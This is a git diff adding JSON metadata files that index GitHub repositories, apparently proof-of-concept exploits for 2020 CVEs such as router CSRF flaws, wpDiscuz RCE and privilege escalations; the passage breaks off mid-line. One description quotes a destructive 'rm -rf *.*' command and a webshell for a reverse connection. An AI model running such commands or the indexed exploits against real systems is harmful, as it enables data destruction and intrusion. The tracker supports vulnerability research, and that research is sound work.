b/2020/CVE-2020-23586.json new file mode 100644 index 0000000000..0350aeeead --- /dev/null +++ b/2020/CVE-2020-23586.json @@ -0,0 +1,33 @@ +[ + { + "id": 568489636, + "name": "CVE-2020-23586", + "full_name": "huzaifahussain98\/CVE-2020-23586", + "owner": { + "login": "huzaifahussain98", + "id": 45964927, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/45964927?v=4", + "html_url": "https:\/\/github.com\/huzaifahussain98", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/huzaifahussain98\/CVE-2020-23586", + "description": "CSRF allows to Add Network Traffic Control Type Rule", + "fork": false, + "created_at": "2022-11-20T17:36:51Z", + "updated_at": "2022-11-22T08:44:49Z", + "pushed_at": "2022-11-20T17:56:53Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-23587.json b/2020/CVE-2020-23587.json new file mode 100644 index 0000000000..37157c67f8 --- /dev/null +++ b/2020/CVE-2020-23587.json @@ -0,0 +1,33 @@ +[ + { + "id": 568489697, + "name": "CVE-2020-23587", + "full_name": "huzaifahussain98\/CVE-2020-23587", + "owner": { + "login": "huzaifahussain98", + "id": 45964927, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/45964927?v=4", + "html_url": "https:\/\/github.com\/huzaifahussain98", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/huzaifahussain98\/CVE-2020-23587", + "description": " Men in the middle attack is possible through CSRF", + "fork": false, + "created_at": "2022-11-20T17:37:03Z", + "updated_at": "2022-11-22T08:44:40Z", + "pushed_at": "2022-11-20T17:55:10Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-23588.json b/2020/CVE-2020-23588.json new file mode 100644 index 0000000000..bf7998b1c6 --- /dev/null +++ b/2020/CVE-2020-23588.json @@ -0,0 +1,33 @@ +[ + { + "id": 568489750, + "name": "CVE-2020-23588", + "full_name": "huzaifahussain98\/CVE-2020-23588", + "owner": { + "login": "huzaifahussain98", + "id": 45964927, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/45964927?v=4", + "html_url": "https:\/\/github.com\/huzaifahussain98", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/huzaifahussain98\/CVE-2020-23588", + "description": "CSRF attack leads to \"Enable or Disable Ports\" and to \"Change port numbers", + "fork": false, + "created_at": "2022-11-20T17:37:14Z", + "updated_at": "2022-11-20T18:00:47Z", + "pushed_at": "2022-11-20T17:53:01Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-23589.json b/2020/CVE-2020-23589.json new file mode 100644 index 0000000000..923b4c31a6 --- /dev/null +++ b/2020/CVE-2020-23589.json @@ -0,0 +1,33 @@ +[ + { + "id": 568489801, + "name": "CVE-2020-23589", + "full_name": "huzaifahussain98\/CVE-2020-23589", + "owner": { + "login": "huzaifahussain98", + "id": 45964927, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/45964927?v=4", + "html_url": "https:\/\/github.com\/huzaifahussain98", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/huzaifahussain98\/CVE-2020-23589", + "description": "Denial of Service through CSRF", + "fork": false, + "created_at": "2022-11-20T17:37:29Z", + "updated_at": "2022-11-20T18:01:59Z", + "pushed_at": "2022-11-20T17:51:18Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-23590.json b/2020/CVE-2020-23590.json new file mode 100644 index 0000000000..d22ebfb6d5 --- /dev/null +++ b/2020/CVE-2020-23590.json @@ -0,0 +1,33 @@ +[ + { + "id": 568489883, + "name": "CVE-2020-23590", + "full_name": "huzaifahussain98\/CVE-2020-23590", + "owner": { + "login": "huzaifahussain98", + "id": 45964927, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/45964927?v=4", + "html_url": "https:\/\/github.com\/huzaifahussain98", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/huzaifahussain98\/CVE-2020-23590", + "description": "CSRF leads to change the password for \"WLAN SSID\"", + "fork": false, + "created_at": "2022-11-20T17:37:49Z", + "updated_at": "2022-11-20T18:04:52Z", + "pushed_at": "2022-11-20T17:49:14Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-23591.json b/2020/CVE-2020-23591.json new file mode 100644 index 0000000000..090ab341d5 --- /dev/null +++ b/2020/CVE-2020-23591.json @@ -0,0 +1,33 @@ +[ + { + "id": 568489978, + "name": "CVE-2020-23591", + "full_name": "huzaifahussain98\/CVE-2020-23591", + "owner": { + "login": "huzaifahussain98", + "id": 45964927, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/45964927?v=4", + "html_url": "https:\/\/github.com\/huzaifahussain98", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/huzaifahussain98\/CVE-2020-23591", + "description": "ARBITAR FILE UPLOAD LEADS TO \"delete every file for Denial of Service (using 'rm -rf *.*' in the code), reverse connection (using '.asp' webshell), backdoor , Escalation of Privileges, etc\".", + "fork": false, + "created_at": "2022-11-20T17:38:06Z", + "updated_at": "2022-11-20T18:06:26Z", + "pushed_at": "2022-11-20T17:47:18Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-23592.json b/2020/CVE-2020-23592.json new file mode 100644 index 0000000000..5df7a73b04 --- /dev/null +++ b/2020/CVE-2020-23592.json @@ -0,0 +1,33 @@ +[ + { + "id": 568490045, + "name": "CVE-2020-23592", + "full_name": "huzaifahussain98\/CVE-2020-23592", + "owner": { + "login": "huzaifahussain98", + "id": 45964927, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/45964927?v=4", + "html_url": "https:\/\/github.com\/huzaifahussain98", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/huzaifahussain98\/CVE-2020-23592", + "description": "CSRF attack leads to Reset ONU to Factory Default ", + "fork": false, + "created_at": "2022-11-20T17:38:21Z", + "updated_at": "2022-11-20T18:07:14Z", + "pushed_at": "2022-11-20T17:45:00Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-23593.json b/2020/CVE-2020-23593.json new file mode 100644 index 0000000000..b90f5be0ad --- /dev/null +++ b/2020/CVE-2020-23593.json @@ -0,0 +1,33 @@ +[ + { + "id": 568490435, + "name": "CVE-2020-23593", + "full_name": "huzaifahussain98\/CVE-2020-23593", + "owner": { + "login": "huzaifahussain98", + "id": 45964927, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/45964927?v=4", + "html_url": "https:\/\/github.com\/huzaifahussain98", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/huzaifahussain98\/CVE-2020-23593", + "description": "INFORMATION DISCLOSURE :CSRF to enable syslog mode and send to remote syslog server IP and Port.", + "fork": false, + "created_at": "2022-11-20T17:39:48Z", + "updated_at": "2022-11-20T18:09:10Z", + "pushed_at": "2022-11-20T17:42:08Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-23839.json b/2020/CVE-2020-23839.json new file mode 100644 index 0000000000..8455a6ecad --- /dev/null +++ b/2020/CVE-2020-23839.json @@ -0,0 +1,33 @@ +[ + { + "id": 352824386, + "name": "CVE-2020-23839", + "full_name": "boku7\/CVE-2020-23839", + "owner": { + "login": "boku7", + "id": 19784872, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/19784872?v=4", + "html_url": "https:\/\/github.com\/boku7", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/boku7\/CVE-2020-23839", + "description": "Public PoC Disclosure for CVE-2020-23839 - GetSimple CMS v3.3.16 suffers from a Reflected XSS on the Admin Login Portal", + "fork": false, + "created_at": "2021-03-30T00:39:25Z", + "updated_at": "2024-08-12T20:11:40Z", + "pushed_at": "2021-03-30T00:50:21Z", + "stargazers_count": 10, + "watchers_count": 10, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 10, + "score": 0, + "subscribers_count": 3 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-23934.json b/2020/CVE-2020-23934.json new file mode 100644 index 0000000000..2ca27de2a0 --- /dev/null +++ b/2020/CVE-2020-23934.json @@ -0,0 +1,33 @@ +[ + { + "id": 295349771, + "name": "CVE-2020-23934", + "full_name": "H0j3n\/CVE-2020-23934", + "owner": { + "login": "H0j3n", + "id": 51261763, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51261763?v=4", + "html_url": "https:\/\/github.com\/H0j3n", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/H0j3n\/CVE-2020-23934", + "description": null, + "fork": false, + "created_at": "2020-09-14T08:16:23Z", + "updated_at": "2024-08-12T20:05:46Z", + "pushed_at": "2021-10-04T05:41:10Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-23968.json b/2020/CVE-2020-23968.json new file mode 100644 index 0000000000..d585a1bef7 --- /dev/null +++ b/2020/CVE-2020-23968.json @@ -0,0 +1,33 @@ +[ + { + "id": 311686992, + "name": "CVE-2020-23968-ILEX-SignGo-EoP", + "full_name": "ricardojba\/CVE-2020-23968-ILEX-SignGo-EoP", + "owner": { + "login": "ricardojba", + "id": 4868297, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/4868297?v=4", + "html_url": "https:\/\/github.com\/ricardojba", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ricardojba\/CVE-2020-23968-ILEX-SignGo-EoP", + "description": "CVE-2020-23968", + "fork": false, + "created_at": "2020-11-10T14:39:20Z", + "updated_at": "2024-02-20T16:48:29Z", + "pushed_at": "2024-02-20T16:48:24Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-24028.json b/2020/CVE-2020-24028.json new file mode 100644 index 0000000000..7e5863cf5e --- /dev/null +++ b/2020/CVE-2020-24028.json @@ -0,0 +1,64 @@ +[ + { + "id": 291787379, + "name": "CVE-2020-24028", + "full_name": "underprotection\/CVE-2020-24028", + "owner": { + "login": "underprotection", + "id": 60452208, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/60452208?v=4", + "html_url": "https:\/\/github.com\/underprotection", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/underprotection\/CVE-2020-24028", + "description": null, + "fork": false, + "created_at": "2020-08-31T18:00:21Z", + "updated_at": "2020-08-31T18:24:01Z", + "pushed_at": "2020-08-31T18:23:59Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 427767417, + "name": "CVE-2020-24028", + "full_name": "redteambrasil\/CVE-2020-24028", + "owner": { + "login": "redteambrasil", + "id": 24315084, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/24315084?v=4", + "html_url": "https:\/\/github.com\/redteambrasil", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/redteambrasil\/CVE-2020-24028", + "description": null, + "fork": false, + "created_at": "2021-11-13T20:37:12Z", + "updated_at": "2021-11-13T20:38:34Z", + "pushed_at": "2021-11-13T20:38:31Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-24029.json b/2020/CVE-2020-24029.json new file mode 100644 index 0000000000..def39e46e2 --- /dev/null +++ b/2020/CVE-2020-24029.json @@ -0,0 +1,64 @@ +[ + { + "id": 291793224, + "name": "CVE-2020-24029", + "full_name": "underprotection\/CVE-2020-24029", + "owner": { + "login": "underprotection", + "id": 60452208, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/60452208?v=4", + "html_url": "https:\/\/github.com\/underprotection", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/underprotection\/CVE-2020-24029", + "description": null, + "fork": false, + "created_at": "2020-08-31T18:26:05Z", + "updated_at": "2020-08-31T18:46:30Z", + "pushed_at": "2020-08-31T18:46:28Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 427767969, + "name": "CVE-2020-24029", + "full_name": "redteambrasil\/CVE-2020-24029", + "owner": { + "login": "redteambrasil", + "id": 24315084, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/24315084?v=4", + "html_url": "https:\/\/github.com\/redteambrasil", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/redteambrasil\/CVE-2020-24029", + "description": null, + "fork": false, + "created_at": "2021-11-13T20:39:59Z", + "updated_at": "2021-11-13T20:40:16Z", + "pushed_at": "2021-11-13T20:40:13Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-24030.json b/2020/CVE-2020-24030.json new file mode 100644 index 0000000000..de41fe665e --- /dev/null +++ b/2020/CVE-2020-24030.json @@ -0,0 +1,64 @@ +[ + { + "id": 291795866, + "name": "CVE-2020-24030", + "full_name": "underprotection\/CVE-2020-24030", + "owner": { + "login": "underprotection", + "id": 60452208, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/60452208?v=4", + "html_url": "https:\/\/github.com\/underprotection", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/underprotection\/CVE-2020-24030", + "description": null, + "fork": false, + "created_at": "2020-08-31T18:38:58Z", + "updated_at": "2020-08-31T18:46:09Z", + "pushed_at": "2020-08-31T18:46:07Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 427768343, + "name": "CVE-2020-24030", + "full_name": "redteambrasil\/CVE-2020-24030", + "owner": { + "login": "redteambrasil", + "id": 24315084, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/24315084?v=4", + "html_url": "https:\/\/github.com\/redteambrasil", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/redteambrasil\/CVE-2020-24030", + "description": null, + "fork": false, + "created_at": "2021-11-13T20:42:31Z", + "updated_at": "2021-11-13T20:43:06Z", + "pushed_at": "2021-11-13T20:43:04Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-24032.json b/2020/CVE-2020-24032.json new file mode 100644 index 0000000000..3eb279282c --- /dev/null +++ b/2020/CVE-2020-24032.json @@ -0,0 +1,33 @@ +[ + { + "id": 331558019, + "name": "CVE-2020-24032", + "full_name": "jet-pentest\/CVE-2020-24032", + "owner": { + "login": "jet-pentest", + "id": 71512502, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/71512502?v=4", + "html_url": "https:\/\/github.com\/jet-pentest", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/jet-pentest\/CVE-2020-24032", + "description": null, + "fork": false, + "created_at": "2021-01-21T08:07:09Z", + "updated_at": "2021-02-14T09:24:10Z", + "pushed_at": "2021-01-21T08:08:27Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-24033.json b/2020/CVE-2020-24033.json new file mode 100644 index 0000000000..262f2e1362 --- /dev/null +++ b/2020/CVE-2020-24033.json @@ -0,0 +1,33 @@ +[ + { + "id": 279171904, + "name": "CVE-2020-24033", + "full_name": "M0NsTeRRR\/CVE-2020-24033", + "owner": { + "login": "M0NsTeRRR", + "id": 37785089, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/37785089?v=4", + "html_url": "https:\/\/github.com\/M0NsTeRRR", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/M0NsTeRRR\/CVE-2020-24033", + "description": null, + "fork": false, + "created_at": "2020-07-13T00:25:58Z", + "updated_at": "2024-01-23T12:55:54Z", + "pushed_at": "2021-04-18T14:52:15Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-24088.json b/2020/CVE-2020-24088.json new file mode 100644 index 0000000000..f34be95bc0 --- /dev/null +++ b/2020/CVE-2020-24088.json @@ -0,0 +1,33 @@ +[ + { + "id": 680932566, + "name": "CVE-2020-24088", + "full_name": "rjt-gupta\/CVE-2020-24088", + "owner": { + "login": "rjt-gupta", + "id": 35985127, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/35985127?v=4", + "html_url": "https:\/\/github.com\/rjt-gupta", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/rjt-gupta\/CVE-2020-24088", + "description": "Windows Privilege Escalation: Foxconn Live Update Utility v2.1.6.26", + "fork": false, + "created_at": "2023-08-20T21:38:41Z", + "updated_at": "2023-08-21T23:23:25Z", + "pushed_at": "2023-09-20T16:22:40Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-24089.json b/2020/CVE-2020-24089.json new file mode 100644 index 0000000000..671ba8b395 --- /dev/null +++ b/2020/CVE-2020-24089.json @@ -0,0 +1,33 @@ +[ + { + "id": 680932830, + "name": "CVE-2020-24089", + "full_name": "rjt-gupta\/CVE-2020-24089", + "owner": { + "login": "rjt-gupta", + "id": 35985127, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/35985127?v=4", + "html_url": "https:\/\/github.com\/rjt-gupta", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/rjt-gupta\/CVE-2020-24089", + "description": "Windows Privilege Escalation: IOBit Malware Fighter v8.0.2", + "fork": false, + "created_at": "2023-08-20T21:40:07Z", + "updated_at": "2023-08-21T23:24:03Z", + "pushed_at": "2023-09-20T16:21:53Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-24148.json b/2020/CVE-2020-24148.json new file mode 100644 index 0000000000..d5242406f5 --- /dev/null +++ b/2020/CVE-2020-24148.json @@ -0,0 +1,33 @@ +[ + { + "id": 385097703, + "name": "CVE-2020-24148", + "full_name": "dwisiswant0\/CVE-2020-24148", + "owner": { + "login": "dwisiswant0", + "id": 25837540, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/25837540?v=4", + "html_url": "https:\/\/github.com\/dwisiswant0", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/dwisiswant0\/CVE-2020-24148", + "description": "CVE-2020-24148 Proof-of-Concept", + "fork": false, + "created_at": "2021-07-12T02:01:26Z", + "updated_at": "2024-11-06T11:55:27Z", + "pushed_at": "2021-07-12T02:25:14Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 5, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-24186.json b/2020/CVE-2020-24186.json new file mode 100644 index 0000000000..9bf7ffd0fd --- /dev/null +++ b/2020/CVE-2020-24186.json @@ -0,0 +1,126 @@ +[ + { + "id": 376657175, + "name": "CVE-2020-24186-wpDiscuz-7.0.4-RCE", + "full_name": "hev0x\/CVE-2020-24186-wpDiscuz-7.0.4-RCE", + "owner": { + "login": "hev0x", + "id": 6265911, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/6265911?v=4", + "html_url": "https:\/\/github.com\/hev0x", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/hev0x\/CVE-2020-24186-wpDiscuz-7.0.4-RCE", + "description": "wpDiscuz 7.0.4 Remote Code Execution", + "fork": false, + "created_at": "2021-06-13T23:10:19Z", + "updated_at": "2024-08-12T20:13:55Z", + "pushed_at": "2021-06-15T17:30:23Z", + "stargazers_count": 17, + "watchers_count": 17, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 17, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 395630203, + "name": "CVE-2020-24186", + "full_name": "meicookies\/CVE-2020-24186", + "owner": { + "login": "meicookies", + "id": 79348524, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/79348524?v=4", + "html_url": "https:\/\/github.com\/meicookies", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/meicookies\/CVE-2020-24186", + "description": "WpDiscuz 7.0.4 Arbitrary File Upload Exploit", + "fork": false, + "created_at": "2021-08-13T11:32:47Z", + "updated_at": "2021-08-13T11:54:45Z", + "pushed_at": "2021-08-13T11:54:43Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 478040003, + "name": "CVE-2020-24186-exploit", + "full_name": "Sakura-501\/CVE-2020-24186-exploit", + "owner": { + "login": "Sakura-501", + "id": 71068573, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/71068573?v=4", + "html_url": "https:\/\/github.com\/Sakura-501", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Sakura-501\/CVE-2020-24186-exploit", + "description": "CVE-2020-24186的攻击脚本", + "fork": false, + "created_at": "2022-04-05T08:31:56Z", + "updated_at": "2024-08-12T20:22:10Z", + "pushed_at": "2022-04-05T08:38:57Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 734528943, + "name": "CVE-2020-24186_reverse_shell_upload", + "full_name": "substing\/CVE-2020-24186_reverse_shell_upload", + "owner": { + "login": "substing", + "id": 76443980, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/76443980?v=4", + "html_url": "https:\/\/github.com\/substing", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/substing\/CVE-2020-24186_reverse_shell_upload", + "description": null, + "fork": false, + "created_at": "2023-12-21T23:23:43Z", + "updated_at": "2024-05-15T06:22:00Z", + "pushed_at": "2023-12-21T23:43:48Z", + "stargazers_count": 15, + "watchers_count": 15, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 15, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-24227.json b/2020/CVE-2020-24227.json new file mode 100644 index 0000000000..3b2172805a --- /dev/null +++ b/2020/CVE-2020-24227.json @@ -0,0 +1,33 @@ +[ + { + "id": 314812045, + "name": "CVE-2020-24227", + "full_name": "nathunandwani\/CVE-2020-24227", + "owner": { + "login": "nathunandwani", + "id": 11877783, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/11877783?v=4", + "html_url": "https:\/\/github.com\/nathunandwani", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/nathunandwani\/CVE-2020-24227", + "description": "Playground Sessions - Storing User Credentials in Plaintext", + "fork": false, + "created_at": "2020-11-21T12:55:42Z", + "updated_at": "2024-08-12T20:07:50Z", + "pushed_at": "2020-11-21T13:18:01Z", + "stargazers_count": 9, + "watchers_count": 9, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 9, + "score": 0, + "subscribers_count": 3 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-24370.json b/2020/CVE-2020-24370.json new file mode 100644 index 0000000000..5fc0641e49 --- /dev/null +++ b/2020/CVE-2020-24370.json @@ -0,0 +1,64 @@ +[ + { + "id": 884177812, + "name": "lua_CVE-2020-24370", + "full_name": "RenukaSelvar\/lua_CVE-2020-24370", + "owner": { + "login": "RenukaSelvar", + "id": 165150685, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/165150685?v=4", + "html_url": "https:\/\/github.com\/RenukaSelvar", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/RenukaSelvar\/lua_CVE-2020-24370", + "description": null, + "fork": false, + "created_at": "2024-11-06T09:38:55Z", + "updated_at": "2024-11-06T09:56:12Z", + "pushed_at": "2024-11-06T09:56:08Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 884191203, + "name": "lua_CVE-2020-24370_AfterPatch", + "full_name": "RenukaSelvar\/lua_CVE-2020-24370_AfterPatch", + "owner": { + "login": "RenukaSelvar", + "id": 165150685, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/165150685?v=4", + "html_url": "https:\/\/github.com\/RenukaSelvar", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/RenukaSelvar\/lua_CVE-2020-24370_AfterPatch", + "description": null, + "fork": false, + "created_at": "2024-11-06T10:09:33Z", + "updated_at": "2024-11-06T10:10:45Z", + "pushed_at": "2024-11-06T10:10:41Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-24490.json b/2020/CVE-2020-24490.json new file mode 100644 index 